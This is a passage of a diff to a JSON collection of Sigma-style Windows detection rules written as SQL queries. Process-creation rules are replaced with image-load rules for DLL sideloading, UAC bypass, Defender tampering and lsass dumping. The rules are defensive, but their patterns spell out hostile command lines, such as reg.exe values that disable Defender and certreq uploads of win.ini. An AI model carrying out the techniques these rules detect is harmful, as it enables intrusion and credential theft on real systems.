'%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine 
LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects cmstp loading \"dll\" or \"ocx\" 
files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName 
LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": 
"proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of 
DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE 
'\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { 
- "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE 